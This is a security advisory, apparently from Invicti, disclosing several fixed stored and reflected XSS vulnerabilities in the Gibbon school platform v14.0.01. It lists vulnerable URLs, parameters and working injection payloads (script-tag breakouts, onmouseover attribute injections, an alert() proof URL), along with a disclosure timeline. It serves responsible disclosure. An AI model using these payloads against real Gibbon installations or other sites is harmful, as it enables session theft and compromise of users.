Multiple XSS Vulnerabilities in Gibbon v14.0.01

Information

Advisory by Netsparker (now Invicti)
Name: Multiple XSS Vulnerabilities in Gibbon
Affected Software: Gibbon
Affected Versions: v14.0.01
Homepage: https://gibbonedu.org/
Vulnerability Type: Stored XSS Vulnerabilities
Severity: High
Status: Fixed
Invicti Advisory Reference: NS-18-01

Technical Details – Stored XSS Vulnerabilities (Frontend)

URL: http://scanned.app/core/index.php?q=preferences.php&return=success0
Injection URL: http://scanned.app/core/preferencesProcess.php
Parameter Name: calendarFeedPersonal
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>netsparker(0x00401A)</scRipt>

Technical Details – XSS Vulnerability (Install)

URL: http://scanned.app/gibbon-install/installer/install.php?step=1&guid=x" onmouseover=netsparker(0x000157) x="
Parameter Name: guid
Parameter Type: GET
Attack Pattern: x%22+onmouseover%3dnetsparker(0x000157)+x%3d%22

URL: http://scanned.app/gibbon-install/installer/install.php?step=2&guid=i4pjwnyc3-hrvk-eg49-nh29-9qnnsipx0x
Parameter Name: databaseUsername
Parameter Type: POST
Attack Pattern: %3cscRipt%3enetsparker(0x0003C6)%3c%2fscRipt%3e

URL: http://scanned.app/gibbon-install/installer/install.php?step=2&guid=i4pjwnyc3-hrvk-eg49-nh29-9qnnsipx0x
Parameter Name: databaseServer
Parameter Type: POST
Attack Pattern: %3cscRipt%3enetsparker(0x000365)%3c%2fscRipt%3e

Technical Details – XSS Vulnerability (Frontend)

URL: http://scanned.app/core/index.php?q=/modules/Resources/resources_view.php&tag='"--></style></scRipt><scRipt>netsparker(0x001B25)</scRipt>
Proof URL: http://scanned.app/core/index.php?q=/modules/Resources/resources_view.php&tag='"--></style></scRipt><scRipt>alert(0x001B25)</scRipt>
Parameter Name: tag
Parameter Type: GET
Attack Pattern: '"--></style></scRipt><scRipt>netsparker(0x001B25)</scRipt>

URL: http://scanned.app/core/modules/Resources/resources_addQuick_ajax.php?file1=&file2=&file3=&file4=&id=x' onmouseover=netsparker(0x04665A) x='&address=&imagesAsLinks=N
Parameter Name: id
Parameter Type: GET
Attack Pattern: x%27+onmouseover%3dnetsparker(0x04665A)+x%3d%27

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline

17th January 2018 – First Contact
20th January 2018 – Vendor Fixed
28th June 2018 – Advisory Released

Credits & Authors

These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.